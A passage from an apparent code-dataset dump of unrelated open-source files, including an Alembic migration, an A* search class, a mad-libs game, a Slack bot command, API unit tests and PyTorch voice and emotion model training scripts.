sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e4b34b113a6a'\ndown_revision = '4fe0f80e5015'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('pet',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=50), nullable=True),\n sa.Column('location', sa.String(length=100), nullable=True),\n sa.Column('animal', sa.String(length=100), nullable=True),\n sa.Column('breed', sa.String(length=200), nullable=True),\n sa.Column('image_url', sa.String(length=200), nullable=True),\n sa.Column('contact', sa.String(length=200), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('liked',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('pet_id', sa.Integer(), nullable=True),\n sa.Column('liked_on', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['pet_id'], ['pet.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('liked')\n op.drop_table('pet')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e4b34b113a6a_.py","file_name":"e4b34b113a6a_.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"24169280","text":"def solution(N, stages):\n fail = [0 for _ in range(N+1)]\n tried = [0 for _ in range(N+1)]\n for stage in stages:\n tried[stage-1] += 1\n for i in range(len(tried)):\n fail[i] = sum(tried[i:])\n ans = []\n for i in range(N):\n if fail[i] != 0:\n ans.append((i+1, (tried[i])/fail[i]))\n else:\n ans.append((i+1, 0))\n ans.sort(key = lambda x: [-x[1], x[0]])\n answer = []\n for a in ans:\n answer.append(a[0])\n return answer","sub_path":"Programmers/2019 KAKAO/실패율.py","file_name":"실패율.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"639293765","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndef plot_data(X):\n plt.plot(X[:, 0], X[:, 1], 'k.', markersize=2)\n\ndef plot_centroids(centroids, weights=None, circle_color='w', cross_color='k'):\n if weights is not None:\n centroids = centroids[weights > weights.max() / 10]\n plt.scatter(centroids[:, 0], centroids[:, 1],\n marker='o', s=30, linewidths=8,\n color=circle_color, zorder=10, alpha=0.9)\n plt.scatter(centroids[:, 0], centroids[:, 1],\n marker='x', s=50, linewidths=50,\n color=cross_color, zorder=11, alpha=1)\n\ndef plot_decision_boundaries(clusterer, X, resolution=1000, show_centroids=True,\n show_xlabels=True, show_ylabels=True):\n mins = X.min(axis=0) - 0.1\n maxs = X.max(axis=0) + 0.1\n xx, yy = np.meshgrid(np.linspace(mins[0], maxs[0], resolution),\n np.linspace(mins[1], maxs[1], resolution))\n Z = clusterer.predict(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n\n plt.contourf(Z, extent=(mins[0], maxs[0], mins[1], maxs[1]),\n cmap=\"Pastel2\")\n plt.contour(Z, extent=(mins[0], maxs[0], mins[1], maxs[1]),\n linewidths=1, colors='k')\n plot_data(X)\n if show_centroids:\n plot_centroids(clusterer.cluster_centers_)\n\n if show_xlabels:\n plt.xlabel(\"$x_1$\", fontsize=14)\n else:\n plt.tick_params(labelbottom='off')\n if show_ylabels:\n plt.ylabel(\"$x_2$\", fontsize=14, rotation=0)\n else:\n plt.tick_params(labelleft='off')","sub_path":"Clustering/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"476193691","text":"import torch\nfrom torch import nn\nimport pytorch_lightning as pl\nfrom pytorch_lightning.metrics import functional as FM\n\nfrom modules import data\nfrom vanilla.deep_emotion import DeepEmotion as DeepEmotionV\nfrom modules.data__ import JAFFEDataModule\n\nfrom vanilla.neutralizer import GrayVGGEncoder, GrayVGGDecoder\n\n\nclass Neutralizer(pl.LightningModule):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.encoder = GrayVGGEncoder()\n self.decoder = GrayVGGDecoder()\n\n def forward(self, x):\n latent = self.encoder(x)\n neutralized = self.decoder(latent)\n\n return {\n 'latent': latent,\n 'neutralized': neutralized\n }\n\n def training_step(self, batch, batch_idx):\n image, desc = batch\n label = desc['exp']\n neutral = desc['neutral']\n\n\nclass DeepEmotion(pl.LightningModule):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.vanilla = DeepEmotionV()\n\n def forward(self, 
x):\n return self.vanilla.forward(x)\n\n def training_step(self, batch, batch_idx):\n # training_step defines the training loop. It is independent of forward\n image, desc = batch\n label = desc['exp']\n\n predictions = self(image)\n\n loss = nn.functional.cross_entropy(predictions, label)\n print(loss)\n result = pl.TrainResult(loss)\n result.log('train_loss', loss)\n\n return result\n\n # def test_step(self, batch, batch_idx):\n # image, desc = batch\n # label = desc['exp']\n #\n # predictions = self(image)\n #\n # loss = nn.functional.cross_entropy(predictions, label)\n #\n # label_hat = predictions.argmax(dim=1).flatten()\n #\n # accuracy = FM.accuracy(label, label_hat, num_classes=len(data.Expression))\n #\n # result = pl.EvalResult(checkpoint_on=loss)\n #\n # result.batch_acc = accuracy\n # result.batch_len = label.shape[0]\n # result.batch_loss = loss\n #\n # return result\n #\n # def test_epoch_end(self, outputs):\n # all_accs = outputs.batch_acc\n # all_loss = outputs.batch_loss\n # all_lens = outputs.batch_len\n # all_lens = torch.tensor(all_lens, dtype=torch.float, device=self.device)\n #\n # epoch_acc = torch.dot(all_accs, all_lens) / all_lens.sum()\n # epoch_loss = torch.dot(all_loss, all_lens) / all_lens.sum()\n #\n # result = pl.EvalResult(checkpoint_on=epoch_loss)\n #\n # result.log('test_acc', epoch_acc, on_step=False, on_epoch=True)\n # result.log('test_loss', epoch_loss, on_step=False, on_epoch=True)\n #\n # return result\n #\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)\n return optimizer\n\n\nif __name__ == '__main__':\n pl.seed_everything(42)\n\n jaffe_dm = JAFFEDataModule(img_size=data.IMG_SIZE_DEEP_EMOTION)\n jaffe_dm.setup()\n\n model = DeepEmotion()\n\n # trainer = pl.Trainer(gpus=-1, max_epochs=6)\n trainer = pl.Trainer(max_epochs=2, row_log_interval=1)\n trainer.fit(model, jaffe_dm)\n # trainer.test(deep_emotion, jaffe.test_dataloader())\n # trainer.test(model_l, test_dataloaders=valid_dl)\n","sub_path":"modules/neutralizer.py","file_name":"neutralizer.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"156091709","text":"__author__ = 'yongkang'\n#coding=utf-8\n\nimport sys\nsys.path.append(\"..\")\nfrom Source.login import Login\nimport Source.host\nimport unittest\nimport json\nimport requests\nimport time\n\nres = Login.login('')\ntoken = res['data']['token']\n\nclass addNotice(unittest.TestCase):\n \"Bidding-open reminder\"\n\n def setUp(self):\n print(\"Starting execution\")\n\n def tearDown(self):\n print(\"Execution finished\")\n time.sleep(3) # brief pause between test cases (was a stray class-level statement)\n\n def test_addnotie_no(self):\n \"Bidding-open reminder not yet set\"\n url = Source.host.host() + '/project/addNotice'\n headers = {'DIVERSION-VERSION':12,'SESSION-TOKEN':token}\n params = {'deal_id':3524}\n req = requests.get(url,headers = headers,params = params)\n data = json.loads(req.text)\n result = json.dumps(data,ensure_ascii=False,indent=1)\n print(result)\n self.assertEqual(req.status_code,200)\n self.assertEqual(data['errno'],0)\n return data\n\n def test_addnotie_have(self):\n \"Bidding-open reminder already set\"\n url = Source.host.host() + '/project/addNotice'\n headers = {'DIVERSION-VERSION':12,'SESSION-TOKEN':token}\n params = {'deal_id':3522}\n req = requests.get(url,headers = headers,params = params)\n data = json.loads(req.text)\n result = json.dumps(data,ensure_ascii=False,indent=1)\n print(result)\n self.assertEqual(req.status_code,200)\n self.assertEqual(data['errno'],100004)\n return data\n\nif __name__ == '__main__':\n 
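# running this module directly executes both reminder cases against the configured API host\n 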
unittest.main()","sub_path":"APP1.2/TestCase/test_addNotice.py","file_name":"test_addNotice.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"527520261","text":"'''Read file (either output of Traveltime_and_trips.py) and by treating data as\nstratified with stratum size = 'period' days, returns graph of optimal period.\n'''\n\nfrom sys import argv\nfrom numpy import mean, var\nfrom matplotlib.pyplot import plot, xlabel, ylabel, axis, show\n\n# Store readfile contents into list data.\nwith open(argv[1], 'r') as readfile:\n data = []\n for line in readfile:\n if len(line):\n data.append(float(line[0:-1]))\n\n# Rearrange data so that hours now increase instead of decreasing.\ndata.reverse()\n\n# Assume different 'periods' in the data, separate data into bins and calculate\n# variance for data stratified thusly.\nSTART_PERIOD_VALUE = 2\nEND_PERIOD_VALUE = 39\ncumulative_strata_variances = {period:0 for period in\n range(START_PERIOD_VALUE, END_PERIOD_VALUE+1)}\n\nfor period in range(START_PERIOD_VALUE, END_PERIOD_VALUE + 1):\n # Convert period in days to period in hours.\n period_in_hours = 24 * period\n # Initialization\n stratified_data = [[] for i in range(period_in_hours)]\n stratified_data_inferred = [[] for i in range(period_in_hours)]\n stratified_means = [0 for i in range(period_in_hours)]\n stratified_variances = [0 for i in range(period_in_hours)]\n # Stratify the data, ignore '-1' values.\n for i in range(len(data)):\n hour = i % period_in_hours\n if data[i] != -1:\n stratified_data[hour].append(data[i])\n # Record means of each stratum (we've ignored the '-1' values).\n for i in range(period_in_hours):\n stratum_mean = round(mean(stratified_data[i]), 2)\n stratified_means[i] = stratum_mean\n # Replace '-1' (missing) values with stratum mean. This is inferred data,\n # no longer true data.\n for i in range(len(data)):\n hour = i % period_in_hours\n if data[i] != -1:\n stratified_data_inferred[hour].append(data[i])\n else:\n stratified_data_inferred[hour].append(stratified_means[hour])\n # Record variance of each stratum\n for i in range(period_in_hours):\n stratum_variance = round(var(stratified_data_inferred[i]), 2)\n stratified_variances[i] = stratum_variance\n # Record the mean of stratum variances across all strata\n cumulative_strata_variances[period] = mean(stratified_variances)\n print (\"Period = %d, Cumulative Strata Variance = %.2f\"\n %(period, cumulative_strata_variances[period]))\n\n# Dips in plot correspond to low cumulative variance i.e. 
high periodicity\n# trend.\n# list() is needed on Python 3, where dict views are not accepted by plot().\nplot(list(cumulative_strata_variances.keys()),\n list(cumulative_strata_variances.values()),'o')\nylabel('Cumulative variance of stratified data')\nxlabel('Assumed period of data')\nshow()\n","sub_path":"Periodicity_analysis.py","file_name":"Periodicity_analysis.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"421378063","text":"\"\"\"\nSlack Bot Show Command\n\"\"\"\n\nimport logging\nimport requests\nimport pendulum\n\nfrom ebr_trackerbot.bot import register_command\nfrom time_utility import parse_time_delta_input\n\n\ndef show_command(text, result, payload, config, commands):\n \"\"\"\n Slack Bot Show Command\n \"\"\"\n\n target_test = result.group(1)\n duration = result.group(2)\n\n logging.debug(\"Show command on \" + target_test + \" over \" + duration)\n\n time_now = pendulum.now(\"UTC\")\n\n start = parse_time_delta_input(duration, time_now)\n\n response = requests.get(\n config[\"api_url\"],\n params={\"test_status\": \"failed\", \"start\": start.to_iso8601_string(), \"end\": time_now.to_iso8601_string()},\n headers={\"accept\": \"application/json\"},\n )\n\n channel_id = payload[\"data\"][\"channel\"]\n thread_ts = payload[\"data\"][\"ts\"]\n\n if \"tests\" not in response.json():\n logging.warning(\"Invalid JSON from api call. It does not contain a tests field.\")\n payload[\"web_client\"].chat_postMessage(\n channel=channel_id, text=\"Something went wrong, please report this failure.\", thread_ts=thread_ts\n )\n return\n\n for test in response.json()[\"tests\"]:\n full_name = test[\"full_name\"]\n if full_name == target_test:\n count = str(test[\"count\"])\n payload[\"web_client\"].chat_postMessage(\n channel=channel_id,\n text=\"Test *{test}* failed {count} times over the last {duration}\".format(\n test=target_test, count=count, duration=duration\n ),\n thread_ts=thread_ts,\n )\n break\n else:\n payload[\"web_client\"].chat_postMessage(\n channel=channel_id,\n text=\"Test *{test}* never failed over {duration}\".format(test=target_test, duration=duration),\n thread_ts=thread_ts,\n )\n\n\nregister_command(\n \"show\",\n \"Shows the current status of a test over the past time interval. Command syntax: show full_testname over time_interval.\"\n + \"Time interval can contain *s* - seconds, *m* - minutes, *h* - hours, *d* - days\"\n + \"(eg. 
20d5h10m5s)\",\n \"^show ([^ ]+) over ((?:[0-9]+(?:s|m|h|d))+)$\",\n show_command,\n)\nlogging.info(\"Show command registered\")\n","sub_path":"ebr_trackerbot/command/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"431888833","text":"\"\"\" Storage backend implementations \"\"\"\nfrom functools import partial\n\nfrom .base import IStorage\nfrom .files import FileStorage\nfrom .s3 import S3Storage, CloudFrontS3Storage\n\nfrom pyramid.path import DottedNameResolver\n\n\ndef get_storage_impl(settings):\n \"\"\" Get and configure the storage backend wrapper \"\"\"\n resolver = DottedNameResolver(__name__)\n storage = settings.get('pypi.storage', 'file')\n if storage == 's3':\n storage = 'pypicloud.storage.S3Storage'\n elif storage == 'cloudfront':\n storage = 'pypicloud.storage.CloudFrontS3Storage'\n elif storage == 'file':\n storage = 'pypicloud.storage.FileStorage'\n storage_impl = resolver.resolve(storage)\n kwargs = storage_impl.configure(settings)\n return partial(storage_impl, **kwargs)\n","sub_path":"pypicloud/storage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"645747005","text":"class Node:\n def __init__(self, parent=None, node=None, pos=None):\n self.parent = parent\n self.node = node\n self.pos = pos\n self.g = 0\n self.h = 0\n self.f = 0\n\n def __eq__(self, other):\n return self.pos == other.pos\n\n\nclass AStarAlgorithm:\n def __init__(self, graph, positions):\n self.graph = graph\n self.positions = positions\n self.start_node = len(graph.nodes) - 2\n self.end_node = len(graph.nodes) - 1\n self.weight = 1\n self.search()\n\n def display(self):\n print(self.graph.nodes)\n print(self.start_node)\n print(self.end_node)\n print(self.graph.edges)\n\n def return_path(self, item_node):\n path = []\n current = item_node\n while current is not None:\n path.append(current)\n current = current.parent\n path = path[::-1]\n print(\"--------------- A star search path --------------\")\n print_string = \"\"\n for i in range(len(path)):\n p_item = path[i]\n print_string += str(p_item.node) + \" --> \"\n # if i == 0 or i == len(path) - 1:\n # print_string += str(p_item.node) + \" --> \"\n # else:\n # print_string += str(p_item.pos) + \" --> \"\n print(print_string[:-5])\n\n def get_children(self, item_node):\n res_nodes = []\n connected_edges = self.graph.edges(item_node.node)\n for edge in connected_edges:\n if not edge[0] == item_node.node:\n res_nodes.append(Node(item_node, edge[0], self.positions[edge[0]]))\n if not edge[1] == item_node.node:\n res_nodes.append(Node(item_node, edge[1], self.positions[edge[1]]))\n return res_nodes\n\n def search(self):\n start_node = Node(None, self.start_node, self.positions[self.start_node])\n start_node.g = start_node.h = start_node.f = 0\n end_node = Node(None, self.end_node, self.positions[self.end_node])\n end_node.g = end_node.h = end_node.f = 0\n open_list = []\n close_list = []\n open_list.append(start_node)\n outer_iterations = 0\n max_iterations = 1000\n # loop until you get the target\n while len(open_list) > 0:\n # Every time any node is referred from open_list\n outer_iterations += 1\n # Get the current node\n current_node = open_list[0]\n current_index = 0\n for index, item in enumerate(open_list):\n if item.f < current_node.f:\n current_node = item\n current_index = index\n # if 
path is greater than max_iterations, stop search\n if outer_iterations > max_iterations:\n print(\"Too many iterations for given start, end\")\n return self.return_path(current_node)\n # Pop current node out of yet_to_visit list, add to visited list\n open_list.pop(current_index)\n close_list.append(current_node)\n # test if goal is reached or not, if yes then return the path\n if current_node == end_node:\n return self.return_path(current_node)\n children = self.get_children(current_node)\n # Loop through children\n for child in children:\n # Child is on the visited list (search entire visited list)\n if len([close_item for close_item in close_list if close_item == child]) > 0:\n continue\n # Create the f, g, and h values\n child.g = current_node.g + self.weight\n child.h = abs(child.pos[0] - end_node.pos[0]) + abs(child.pos[1] - end_node.pos[1])\n child.f = child.g + child.h\n # Child is already in the open_list and g cost is already lower\n if len([i for i in open_list if child == i and child.g > i.g]) > 0:\n continue\n open_list.append(child)\n","sub_path":"code/python/AStarAlgorithm.py","file_name":"AStarAlgorithm.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"289016600","text":"from termcolor import colored\nfrom os import system\nimport readline\nimport random\nimport re\n\nclass Mad_Lib:\n def __init__(self, mad_lib = None, name = None):\n self.name = name\n self.MAD_LIB = mad_lib\n self.mad_lib = mad_lib\n self.user_inputs = {}\n \n # Check if user input is not blank and the correct pos, if available.\n def is_valid(self, pos, user_input):\n if type(user_input) == str:\n if user_input == '' or re.match('\\s+', user_input):\n return False\n else: \n return True\n\n # Take any text enclosed in [] and insert it into the inputs array \n def get_inputs(self):\n # Get the inputs from the mad lib and set each input to its pos tuple value\n # Thanks to Kevin for helping me refactor the regex key from '\\[([a-z]([a-z]|\\s)+)\\]' to '\\[(\\w(\\w|\\s)+)\\]' so they can accept more than just lowercase letters\n tuple_inputs = re.findall('\\[(\\w(\\w|\\s)+)\\]', self.mad_lib)\n for index, mad_lib_tuple in enumerate(tuple_inputs): tuple_inputs[index] = mad_lib_tuple[0]\n # Get proper pos user input, if input is a pos, for each input\n for mad_lib_input in tuple_inputs: \n user_input = input(f'{mad_lib_input}: ') \n while not self.is_valid(mad_lib_input, user_input):\n user_input = input(f'Invalid, input is not a {mad_lib_input}: ')\n if (mad_lib_input not in self.user_inputs): \n self.user_inputs[mad_lib_input] = [colored(user_input, 'green')] \n else:\n self.user_inputs[mad_lib_input].append(colored(user_input, 'green'))\n\n # Get random words to be used as inputs from the /usr/share/dict/words file\n def get_random_inputs(self):\n inputs = re.findall('\\[(\\w(\\w|\\s)+)\\]', self.mad_lib)\n for index, mad_lib_tuple in enumerate(inputs): inputs[index] = mad_lib_tuple[0]\n words = open('/usr/share/dict/words', 'r').readlines()\n for index, word in enumerate(words): words[index] = re.sub('(\\\\n)', '', word)\n word_inputs = []\n for i in range(len(inputs)):\n word_inputs.append(colored(random.choice(words), 'green'))\n self.user_inputs = word_inputs\n\n # Substitute bracket-enclosed text with user input\n def create(self):\n self.get_inputs()\n for key in self.user_inputs.keys():\n # Shuffle the user input for each pos and insert them into mad lib\n shuffled_list = 
random.sample(self.user_inputs[key], len(self.user_inputs[key]))\n for index, word in enumerate(reversed(list(shuffled_list))):\n self.mad_lib = re.sub(f'\\[{key}\\]', word, self.mad_lib, 1)\n \n def random_create(self):\n self.get_random_inputs()\n for index, word in enumerate(self.user_inputs):\n self.mad_lib = re.sub('\\[(\\w(\\w|\\s)+)\\]', word, self.mad_lib, 1)\n\n def print(self):\n system('clear')\n print(self.name)\n print(self.mad_lib)\n\n def start(self, create_type):\n if self.mad_lib and self.name and create_type == 'normal':\n print(self.name)\n self.create()\n self.print()\n self.mad_lib = self.MAD_LIB\n self.user_inputs = {}\n elif self.mad_lib and self.name and create_type == 'random':\n self.random_create()\n self.print()\n self.mad_lib = self.MAD_LIB\n self.user_inputs = {}\n else: \n print('Error, missing values')\n\n\nkevin_mad_lib = '''\n Kevin is a very [adjective] [noun], he gets really [verb] when people have \n the same name as him. Sometimes, Kevin enjoys [outdoor activity] with \n his friend [noun].\n '''\ntortoise_and_the_hare = '''\n Once upon a time there was a hare who, [verb] how he could [action verb] [comparative adjective] \n than anyone else. He always would be [word that ends in ing] tortoise for its [adjective]. Then \n one day, the [adjective] tortoise [verb] back: “Who do you think you are? There’s no denying \n you’re [adjective], but even you can be [adjective]!” The hare [verb] with [noun]. “[verb] \n in a [competition]? By whom? Not you, surely! I bet there’s nobody in the [noun] that can win \n against me, I’m so [adjective]. Now, why don’t you [verb] off?”\n '''\n\nk_mad_lib = Mad_Lib(kevin_mad_lib, 'Kevin')\ntath_mad_lib = Mad_Lib(tortoise_and_the_hare, 'Tortoise and the Hare')\nmad_libs = [k_mad_lib, tath_mad_lib]\n\nsystem('clear')\nshould_continue = True\nwhile should_continue:\n for index, mad_lib in enumerate(mad_libs):\n print('{} {}'.format(index, mad_lib.name))\n\n user_input = input(\"Enter a mad lib's index to start, or Q to quit: \")\n while user_input != '' and re.match('\\s+', user_input):\n user_input = input(f\"Index is invalid, try again or hit Q to quit: \")\n system('clear')\n\n if user_input.isnumeric():\n print('Would you like to enter your own inputs? 
Y/n')\n user_selection = input()\n if user_selection == 'Y' or user_selection == 'y' or re.match('(\\s+)', user_selection):\n mad_libs[int(user_input)].start('normal')\n elif user_selection == 'N' or user_selection == 'n': \n mad_libs[int(user_input)].start('random')\n else:\n print('Unknown Input')\n\n elif user_input == 'Q' or user_input == 'q':\n system('clear')\n should_continue = False\n\n else: \n print('Invalid input')","sub_path":"Projects/mad_lib/madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"337159246","text":"import os, sys\nimport argparse\nimport numpy as np\nimport time\nimport torch\nimport torch.optim as optim\nfrom loss import LogManager, calc_gaussprob, calc_kl_vae, nllloss, calc_entropy, calc_err, l1loss, calc_entropy_log\nimport pickle\nimport model\nfrom itertools import combinations\nimport data_manager as dm\nimport json\n\ndef load_pickle(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\ndef load_sp(feat_dir, num_mcep=36):\n feat_path = os.path.join(feat_dir, 'feats.p')\n with open(feat_path, 'rb') as f:\n sp, sp_m, sp_s, logf0_m, logf0_s = pickle.load(f)\n return sp\n\ndef load_ppg(feat_dir, num_mcep=36):\n ppg_path = os.path.join(feat_dir, 'ppg{}.p'.format(num_mcep))\n with open(ppg_path, 'rb') as f:\n ppg = pickle.load(f)\n return ppg\n\ndef calc_parm_num(model):\n total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n return total_params\n\ndef update_parm(opt_list, loss):\n for opt in opt_list:\n opt.zero_grad()\n loss.backward()\n for opt in opt_list:\n opt.step()\n\ndef set_DEC(DEC, mode, is_MD=False):\n assert mode in ['train', 'eval']\n if is_MD:\n for dec in DEC.values():\n if mode=='train':\n dec.train()\n if mode==\"eval\":\n dec.eval()\n else:\n if mode=='train':\n DEC.train()\n if mode==\"eval\":\n DEC.eval()\n \n\n\"\"\"\nVAE 1: Vanilla\nVAE 2: Decoder Speaker vector\nVAE 3: All Speaker vector (S2S)\nMD: Multi Decoder (S2S)\n\n============ A2A ============\n\nSI: Minimize speaker info (cross entropy) of latent \nI: Maximize latent entropy\nLI: Maximize ppg info of latent \n\n============ A2B ============\n\nAC: speaker loss in converted x\nSC: l1(latent - cycle latent)\nCC: cycle loss\n\nGAN : discriminator\n\"\"\"\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--seed', type=int, default=0)\nparser.add_argument('--model_dir', default='')\nparser.add_argument('--lr', type=float, default=0)\nparser.add_argument('--c_lr', type=float, default=2.5*1e-5)\n\nparser.add_argument('--epochs',type=int, default=2000)\n\nparser.add_argument('--spk',type=str, default='')\n\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\ntorch.backends.cudnn.deterministic=True\ntorch.backends.cudnn.benchmark=False\nnp.random.seed(args.seed)\n\n\n# Data load\n# SPK_LIST = ['F1','M1','F2','M2']\n# SPK_LIST = ['VCC2SF1','VCC2SF2','VCC2SM1','VCC2SM2']\nif args.spk != \"\":\n SPK_LIST = ['VCC2SF1','VCC2SF2','VCC2SM1','VCC2SM2','VCC2SF3','VCC2SF4','VCC2SM3','VCC2SM4'] \nelse:\n SPK_LIST = ['VCC2SF1','VCC2SF2','VCC2SM1','VCC2SM2'] \nTOTAL_SPK_NUM = len(SPK_LIST)\n\nPPG_DICT_TRAIN = {\n spk_id:load_ppg(os.path.join(\"data\",\"train\", spk_id)) \n for spk_id in SPK_LIST\n}\n\nPPG_DICT_DEV = {\n spk_id:load_ppg(os.path.join(\"data\",\"dev\", spk_id)) \n for spk_id in SPK_LIST\n}\n\nSP_DICT_TRAIN = {\n spk_id:load_sp(os.path.join(\"data\",\"train\", spk_id)) \n for spk_id in 
SPK_LIST\n}\n\nSP_DICT_DEV = dict()\nfor spk_id in SPK_LIST:\n sps = []\n for _, _, file_list in os.walk(os.path.join(\"data\", \"dev\", spk_id)):\n for file_id in file_list:\n utt_id = file_id.split(\".\")[0]\n if utt_id == \"ppg36\":\n continue\n file_path = os.path.join(\"data\", \"dev\", spk_id, file_id)\n _,coded_sp, f0, ap = load_pickle(file_path)\n sps.append(coded_sp)\n SP_DICT_DEV[spk_id]=sps\n# Model initilaization\nmodel_dir = args.model_dir\n\nprint(model_dir)\nos.makedirs(model_dir, exist_ok=True)\n\nlatent_dim=8\n\n\n# lr = 1e-3\nc_lr = 1e-5*2.5\n\nAC = model.DataClassifier(latent_dim=latent_dim, label_num=TOTAL_SPK_NUM)\nAC.cuda()\nAC_opt = optim.Adam(AC.parameters(), lr=c_lr)\nAC_sch = optim.lr_scheduler.ExponentialLR(AC_opt, 0.5)\n\n# 8 16\n# (0-499) (500-999)\ntotal_time = 0\n\nmin_dev_loss = 9999999999999999\nmin_epoch = 0\nd_epoch = 1\n\nlm = LogManager()\nlm.alloc_stat_type_list([\"train_loss\", \"train_acc\", \"dev_loss\", \"dev_acc\"])\npretrain_epochs = args.epochs\nbatch_size = 8\nprint(\"Train AC\")\nfor epoch in range(pretrain_epochs):\n print(\"AC EPOCH: {} LearningRate: {}\".format(epoch, AC_sch.get_last_lr()[0]))\n lm.init_stat() \n # Train\n AC.train()\n train_loader = dm.feat_loader_single(SP_DICT_TRAIN, batch_size, shuffle=True)\n for self_idx, coded_sp in train_loader:\n\n x = dm.make_spk_target(self_idx, batch_size, is_MD=False)\n\n pred_x = AC(coded_sp)\n spk_loss = nllloss(pred_x, x)\n spk_err = calc_err(pred_x, x)\n\n AC_opt.zero_grad()\n spk_loss.backward()\n AC_opt.step()\n\n lm.add_torch_stat(\"train_loss\", spk_loss)\n lm.add_torch_stat(\"train_acc\", 1.0 - spk_err)\n\n print(\"Train:\", end=' ')\n lm.print_stat()\n lm.init_stat()\n # Dev\n AC.eval()\n dev_loader = dm.feat_loader_single(SP_DICT_DEV, batch_size, shuffle=False)\n for self_idx, coded_sp in dev_loader:\n\n x = dm.make_spk_target(self_idx, batch_size, is_MD=False)\n\n pred_x = AC(coded_sp)\n spk_loss = nllloss(pred_x, x)\n spk_err = calc_err(pred_x, x)\n\n lm.add_torch_stat(\"dev_loss\", spk_loss)\n lm.add_torch_stat(\"dev_acc\", 1.0 - spk_err)\n \n print(\"DEV:\", end=' ')\n lm.print_stat()\n print(\".....................\")\n # AC_sch.step()\n AC.eval()\n\ntorch.save(AC.state_dict(), os.path.join(model_dir,\"ac_{}.pt\".format(pretrain_epochs)))\n\n\n","sub_path":"exp/ac/pretrain_ac.py","file_name":"pretrain_ac.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"223980408","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.dataloader import _use_shared_memory\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nfrom collections import namedtuple\nimport torch.nn.utils.weight_norm as weightNorm\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport torch.autograd as autograd\n\nclass STEncoder(nn.Module):\n def __init__(self, num_layers, hidden_size, bidirection, embedding_dim):\n super(STEncoder, self).__init__()\n \n self.num_layers = num_layers\n self.thought_size = hidden_size\n self.direction = 1\n if bidirection:\n self.direction = 2\n \n self.embedding_dim = embedding_dim\n \n self.rnn = nn.LSTM(input_size=self.embedding_dim, hidden_size=self.thought_size, num_layers=self.num_layers, batch_first=False, bidirectional=True)\n \n def hidden_init(self, batch_size): \n if torch.cuda.is_available():\n 
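# zero-initialized (h0, c0) pair for the LSTM; the first dimension is direction * num_layers\n 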
return (autograd.Variable(torch.zeros(self.direction*self.num_layers, batch_size, self.thought_size).cuda()),\n autograd.Variable(torch.zeros(self.direction*self.num_layers, batch_size, self.thought_size).cuda()))\n return (autograd.Variable(torch.zeros(self.direction*self.num_layers, batch_size, self.thought_size)),\n autograd.Variable(torch.zeros(self.direction*self.num_layers, batch_size, self.thought_size))) \n \n def forward(self, input, inputLenghts):\n packedInputX = pack_padded_sequence(input, inputLenghts, batch_first = False)\n inputX, self.hidden = self.rnn(packedInputX)\n padOutputX, _ = pad_packed_sequence(inputX)\n output_ofLastHiddenState = self.hidden[0].clone()\n \n output_ofLastHiddenState = torch.mean(output_ofLastHiddenState, dim = 0)\n \n return output_ofLastHiddenState\n\nclass STDuoDecoderAttn(nn.Module):\n def __init__(self, hidden_size, embedding_dim, thought_size, vocab_size):\n super(STDuoDecoderAttn, self).__init__()\n self.hidden_size = hidden_size\n self.embedding_dim = embedding_dim\n self.thought_size = thought_size\n self.num_embeddings = vocab_size ## give current ones \n \n #Hidden units\n hidden1 = torch.zeros(1, self.hidden_size)\n hidden2 = torch.zeros(1, self.hidden_size)\n if torch.cuda.is_available():\n hidden1 = hidden1.cuda()\n hidden2 = 